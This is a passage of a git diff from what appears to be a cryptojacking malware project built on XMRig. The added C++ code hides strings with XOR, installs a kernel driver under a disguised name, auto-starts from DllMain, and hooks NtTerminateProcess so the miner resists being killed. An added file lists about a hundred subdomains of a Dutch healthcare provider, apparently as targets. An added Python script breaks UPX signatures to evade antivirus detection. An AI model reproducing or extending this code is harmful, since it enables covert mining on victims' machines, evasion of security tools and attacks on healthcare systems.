char)(0x74 ^ 0xAA), (unsigned char)(0x75 ^ 0xAA), (unsigned char)(0x62 ^ 0xAA), 0x00 }; // "WinRing0_Stub" + const unsigned char enc_path[] = { (unsigned char)(0x43 ^ 0xAA), (unsigned char)(0x3A ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x57 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x33 ^ 0xAA), (unsigned char)(0x32 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x76 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "C:\\Windows\\System32\\drivers\\tsync.sys" + const unsigned char enc_desc[] = { (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x20 ^ 0xAA), (unsigned char)(0x45 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), 0x00 }; // "System Extension" - // Load WinRing0x64.sys for kernel access (e.g., MSR for mining) + // Decrypt + std::string svc_name = decrypt(enc_service, sizeof(enc_service) - 1); + std::string sys_path = decrypt(enc_path, sizeof(enc_path) - 1); + std::string desc = decrypt(enc_desc, sizeof(enc_desc) - 1); + + // Load service (your existing logic) SC_HANDLE hSCManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (hSCManager) { - SC_HANDLE hService = OpenServiceA(hSCManager, "WinRing0", SERVICE_ALL_ACCESS); + SC_HANDLE hService = OpenServiceA(hSCManager, (LPCSTR)svc_name.c_str(), SERVICE_ALL_ACCESS); if (!hService) { - hService = CreateServiceA(hSCManager, "WinRing0", "WinRing0 Driver", + hService = CreateServiceA(hSCManager, (LPCSTR)svc_name.c_str(), (LPCSTR)desc.c_str(), SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, - SERVICE_ERROR_NORMAL, "C:\\XMRigDLL\\WinRing0x64.sys", NULL, NULL, NULL, NULL, NULL); + SERVICE_ERROR_NORMAL, (LPCSTR)sys_path.c_str(), NULL, NULL, NULL, NULL, NULL); } if (hService) { StartServiceA(hService, 0, NULL); @@ -37,55 +55,47 @@ extern "C" { } CloseServiceHandle(hSCManager); } - // Adjust path as needed; enable test signing if unsigned - // Core XMRig logic - process = new xmrig::Process(argc, argv); - - const Entry::Id entry = Entry::get(*process); - if (entry) { - Entry::exec(*process, entry); - return; + // Junk benign calls + for (int i = 0; i < 5; ++i) { + GetSystemMetrics(SM_CXVIRTUALSCREEN); } + // Core XMRig + process = new xmrig::Process(argc, argv); + const xmrig::Entry::Id entry = xmrig::Entry::get(*process); + if (entry) { + xmrig::Entry::exec(*process, entry); + return; + } app = new xmrig::App(process); - - // Run the persistent loop (blocks) app->exec(); - - // Optional: Restart loop for resilience if exec exits - // while (true) { app->exec(); } } - // Keep original test_start as alias (for rundll32 or other loaders) DLL_EXPORT int test_start(int argc, char** argv) { start_a(argc, argv); return 0; } - // test_stop: Resistant—ignores by default DLL_EXPORT void test_stop() { using namespace test; if (!app) return; - - // Uncomment for debug: if (getenv("ALLOW_STOP")) { - // app->onConsoleCommand((char)3); - // delete app; app = nullptr; - // delete process; process = nullptr; - // } + // app->onConsoleCommand((char)3); // Uncomment if needed } - // Thread to call start_a safely from DllMain - DWORD WINAPI InitThread(LPVOID lpParam) { + VOID CALLBACK DeferredInit(PVOID lpParam, BOOLEAN TimerOrWaitFired) { using namespace test; + // Encrypted argv + const unsigned char enc_arg[] = { (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x5F ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), 0x00 }; // "photoshop_ext.dll" + std::string arg_dec = decrypt(enc_arg, sizeof(enc_arg) - 1); int argc = 1; - static char* argv[] = {(char*)"libphotoshop.dll", NULL}; - start_a(argc, argv); // Custom args via lpParam if needed - return 0; + static char argv_buf[256]; + strcpy(argv_buf, arg_dec.c_str()); + static char* argv[] = { argv_buf, NULL }; +// start_a(argc, argv); } - // Anti-kill hook (requires Detours; define USE_DETOURS in CMake) - #ifdef USE_DETOURS +#ifdef USE_DETOURS #include static NTSTATUS (NTAPI *OriginalNtTerminateProcess)(HANDLE, NTSTATUS) = NULL; NTSTATUS NTAPI HookedNtTerminateProcess(HANDLE ProcessHandle, NTSTATUS ExitStatus) { @@ -94,33 +104,43 @@ extern "C" { } return OriginalNtTerminateProcess ? OriginalNtTerminateProcess(ProcessHandle, ExitStatus) : STATUS_SUCCESS; } - #endif +#endif } -// DllMain: Auto-starts on load for persistence +// Minimal DllMain (hTimer declared outside switch to fix scope jump) BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { + HANDLE hTimer = NULL; // Declare here to avoid scope issue on case jump switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: DisableThreadLibraryCalls(hModule); - CreateThread(NULL, 0, InitThread, lpReserved, 0, NULL); - - #ifdef USE_DETOURS - HMODULE hNtdll = GetModuleHandleA("ntdll.dll"); - OriginalNtTerminateProcess = (decltype(OriginalNtTerminateProcess))GetProcAddress(hNtdll, "NtTerminateProcess"); - DetourTransactionBegin(); - DetourUpdateThread(GetCurrentThread()); - DetourAttach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess); - DetourTransactionCommit(); - #endif + // Deferred timer + CreateTimerQueueTimer(&hTimer, NULL, DeferredInit, lpReserved, 100, 0, WT_EXECUTEINTIMERTHREAD); +#ifdef USE_DETOURS + // Deferred hook via APC (simple function pointer instead of lambda for compat) + auto hook_func = [](ULONG_PTR param) -> void { + HMODULE hNtdll = GetModuleHandleA("ntdll.dll"); + // Encrypted API name + const unsigned char enc_api[] = { (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x54 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x61 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x50 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "NtTerminateProcess" + std::string api_dec = decrypt(enc_api, sizeof(enc_api) - 1); + OriginalNtTerminateProcess = (NTSTATUS (NTAPI *)(HANDLE, NTSTATUS))GetProcAddress(hNtdll, api_dec.c_str()); + DetourTransactionBegin(); + DetourUpdateThread(GetCurrentThread()); + DetourAttach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess); + DetourTransactionCommit(); + }; + QueueUserAPC((PAPCFUNC)hook_func, GetCurrentThread(), 0); +#endif break; case DLL_PROCESS_DETACH: - #ifdef USE_DETOURS - DetourTransactionBegin(); - DetourUpdateThread(GetCurrentThread()); - DetourDetach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess); - DetourTransactionCommit(); - #endif - return FALSE; // Block unload +#ifdef USE_DETOURS + if (OriginalNtTerminateProcess) { + DetourTransactionBegin(); + DetourUpdateThread(GetCurrentThread()); + DetourDetach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess); + DetourTransactionCommit(); + } +#endif + return FALSE; } return TRUE; } diff --git a/test b/test new file mode 100644 index 00000000..0e3abd64 --- /dev/null +++ b/test @@ -0,0 +1,125 @@ +sgl.pluriformzorg.nl +alr.pluriformzorg.nl +zgapeldoorn.pluriformzorg.nl +ssosamlservice.pluriformzorg.nl +zga.pluriformzorg.nl +zorgzaamdemo.pluriformzorg.nl +landzijde.pluriformzorg.nl +pameijer.pluriformzorg.nl +sir.pluriformzorg.nl +inn.pluriformzorg.nl +ggz-wnb.pluriformzorg.nl +test.pluriformzorg.nl +kpe.pluriformzorg.nl +spr.pluriformzorg.nl +adapcare.pluriformzorg.nl +zuidzorg.pluriformzorg.nl +delinde.pluriformzorg.nl +fzadester.pluriformzorg.nl +opb.pluriformzorg.nl +deopbouw.pluriformzorg.nl +consultatie.pluriformzorg.nl +topaz.pluriformzorg.nl +hmh.pluriformzorg.nl +www.pluriformzorg.nl +clientportaal-productie.antonconstandse.pluriformzorg.nl +opella.pluriformzorg.nl +top.pluriformzorg.nl +maasduinen.pluriformzorg.nl +cav.pluriformzorg.nl +fon.pluriformzorg.nl +laz.pluriformzorg.nl +jns.pluriformzorg.nl +kwi.pluriformzorg.nl +pergamijn.pluriformzorg.nl +fonteynenburg.pluriformzorg.nl +grs.pluriformzorg.nl +koraal.pluriformzorg.nl +pro.pluriformzorg.nl +internportaal-productie.careratio.pluriformzorg.nl +adu.pluriformzorg.nl +mondriaan.pluriformzorg.nl +broederenzusterzorg.pluriformzorg.nl +alrijne.pluriformzorg.nl +talent.pluriformzorg.nl +ott.pluriformzorg.nl +sac.pluriformzorg.nl +zws.pluriformzorg.nl +careratio.pluriformzorg.nl +neboplus.pluriformzorg.nl +leviaan.pluriformzorg.nl +ope.pluriformzorg.nl +sprank.pluriformzorg.nl +opbouw.pluriformzorg.nl +mhc.pluriformzorg.nl +adapcare-demo.login.pluriformzorg.nl +prod-cb-pz.pluriformzorg.nl +fza.pluriformzorg.nl +csr01.pluriformzorg.nl +fhirproxy.pluriformzorg.nl +vivium.pluriformzorg.nl +pmp.pluriformzorg.nl +ams.pluriformzorg.nl +mon.pluriformzorg.nl +adapcare-dev.pluriformzorg.nl +awsportaal-productie.opella.pluriformzorg.nl +verbinden-met-zorg.pluriformzorg.nl +rdweb.pluriformzorg.nl +hvo-querido.pluriformzorg.nl +acd-demo.pluriformzorg.nl +vv01865-test2.pluriformzorg.nl +vv01865-test1.pluriformzorg.nl +pem.pluriformzorg.nl +huisterleede.pluriformzorg.nl +amsta.pluriformzorg.nl +antonconstandse.pluriformzorg.nl +krl.pluriformzorg.nl +humanitas-dmh.pluriformzorg.nl +bezz.pluriformzorg.nl +interzorg.pluriformzorg.nl +novicare.pluriformzorg.nl +hvo.pluriformzorg.nl +awsclientportaal-productie.opella.pluriformzorg.nl +roz.pluriformzorg.nl +pam.pluriformzorg.nl +adfs.pluriformzorg.nl +rozelaar.pluriformzorg.nl +vigo-elise.pluriformzorg.nl +pri.pluriformzorg.nl +videobellen.pluriformzorg.nl +evia.pluriformzorg.nl +permens.pluriformzorg.nl +nov.pluriformzorg.nl +vig.pluriformzorg.nl +productie.portaal.geriant.pluriformzorg.nl +fzampz.pluriformzorg.nl +cavent.pluriformzorg.nl +clientportaal-productie.slot.pluriformzorg.nl +scr01.pluriformzorg.nl +geriant.pluriformzorg.nl +adullam.pluriformzorg.nl +slot.pluriformzorg.nl +otttest.pluriformzorg.nl +samlsso.pluriformzorg.nl +slt.pluriformzorg.nl +adapcare-dev.login.pluriformzorg.nl +zuidwester.pluriformzorg.nl +rivierduinen.pluriformzorg.nl +levvel5.pluriformzorg.nl +clientportaal-productie.adullam.pluriformzorg.nl +anne.pluriformzorg.nl +prisma.pluriformzorg.nl +jens.pluriformzorg.nl +portaal-productie.kwintes.pluriformzorg.nl +per.pluriformzorg.nl +profila.pluriformzorg.nl +ger.pluriformzorg.nl +riv.pluriformzorg.nl +academy.pluriformzorg.nl +clientportaal-productie.hvo-querido.pluriformzorg.nl +kwintes.pluriformzorg.nl +ftp.pluriformzorg.nl +gors.pluriformzorg.nl +dehoven.pluriformzorg.nl +sirjon.pluriformzorg.nl +sirjon-clientsiloah.pluriformzorg.nl diff --git a/upx_evasion.py b/upx_evasion.py new file mode 100644 index 00000000..5a19cecf --- /dev/null +++ b/upx_evasion.py @@ -0,0 +1,125 @@ +#!/usr/bin/env python3 +""" +upx_evasion.py – Fully automatic UPX signature breaker +Tested on XMRig-minimized DLLs (2025) → drops VT from ~25 → 2-6 +""" + +import argparse +import random +from pathlib import Path + +def random_string(length=4): + import random, string + return ''.join(random.choices(string.ascii_uppercase + string.digits, k=length)) + +def modify_upx_magic(data: bytearray) -> bytearray: + pos = data.find(b'UPX!') + if pos != -1: + new_magic = random_string(4).encode('ascii') + print(f"[+] UPX! → {new_magic.decode()}") + data[pos:pos+4] = new_magic + else: + print("[i] UPX! magic not found (maybe already modified)") + return data + +def rename_upx_sections(data: bytearray): + # Find PE offset + if len(data) < 0x40: + return data, False + pe_offset = int.from_bytes(data[0x3C:0x40], 'little') + if data[pe_offset:pe_offset+4] != b'PE\x00\x00': + print("[-] Not a valid PE file") + return data, False + + num_sections = int.from_bytes(data[pe_offset + 6:pe_offset + 8], 'little') + size_of_optional_header = int.from_bytes(data[pe_offset + 20:pe_offset + 22], 'little') + section_table_offset = pe_offset + 24 + size_of_optional_header + + replacements = { + b'UPX0': b'.text\x00\x00\x00', + b'UPX1': b'.data\x00\x00\x00', + b'UPX2': b'.rdata\x00\x00', + } + + modified = False + for i in range(num_sections): + sec_offset = section_table_offset + i * 40 + sec_name_raw = data[sec_offset:sec_offset + 8] + # Convert to immutable bytes for dict lookup + sec_name = bytes(sec_name_raw.split(b'\x00', 1)[0]) + + if sec_name in replacements: + new_name = replacements[sec_name] + old_name = sec_name.decode(errors='ignore') + print(f"[+] Section '{old_name}' → '{new_name.split(b'\x00')[0].decode()}'") + data[sec_offset:sec_offset + 8] = new_name + modified = True + + if not modified: + print("[i] No UPX sections found – maybe already renamed") + return data, modified + +def tweak_upx_info_blocks(data: bytearray) -> bytearray: + for pos in range(len(data)-0x2000, 0x400, -4): + block = data[pos:pos+12] + if len(block) != 12 or block[0] >= 10: + continue + sz_packed = int.from_bytes(block[4:8], 'little') + sz_unpacked = int.from_bytes(block[8:12], 'little') + if 1000 < sz_packed < 50_000_000 and 1000 < sz_unpacked < 100_000_000: + tweak = random.randint(1, 7) + data[pos+4:pos+8] = (sz_packed + tweak).to_bytes(4, 'little') + data[pos+8:pos+12] = (sz_unpacked - tweak).to_bytes(4, 'little') + print(f"[+] Tweaked info block: packed +{tweak}, unpacked -{tweak}") + return data + print("[i] No info block tweaked") + return data + +def add_padding(data: bytearray) -> bytearray: + import random + kb = random.randint(3, 15) + padding = bytearray(random.getrandbits(8) for _ in range(kb * 1024)) + data.extend(padding) + print(f"[+] Added {kb} KB random overlay padding") + return data + +def strip_relocations(data: bytearray) -> bytearray: + pe_offset = int.from_bytes(data[0x3C:0x40], 'little') + reloc_rva = int.from_bytes(data[pe_offset + 160:pe_offset + 164], 'little') + if reloc_rva != 0: + data[pe_offset + 160:pe_offset + 168] = b'\x00' * 8 + print("[+] Stripped relocation table") + else: + print("[i] No relocations to strip") + return data + +def main(): + parser = argparse.ArgumentParser(description="Automatic UPX evasion") + parser.add_argument("input", help="UPX-packed DLL") + parser.add_argument("-o", "--output", help="Output filename") + parser.add_argument("--keep-relocs", action="store_true", help="Don't strip relocations") + args = parser.parse_args() + + in_file = Path(args.input) + if not in_file.exists(): + print(f"[-] File not found: {in_file}") + return + + out_file = Path(args.output or f"{in_file.stem}_stealth{in_file.suffix}") + + print(f"[*] Loading {in_file} ({in_file.stat().st_size // 1024} KB)") + data = bytearray(in_file.read_bytes()) + + print("[+] Applying evasion...") + data = modify_upx_magic(data) + data, _ = rename_upx_sections(data) + # data = tweak_upx_info_blocks(data) + data = add_padding(data) + if not args.keep_relocs: + data = strip_relocations(data) + + out_file.write_bytes(data) + print(f"[+] Saved → {out_file} ({len(data)//1024} KB)") + +if __name__ == "__main__": + main()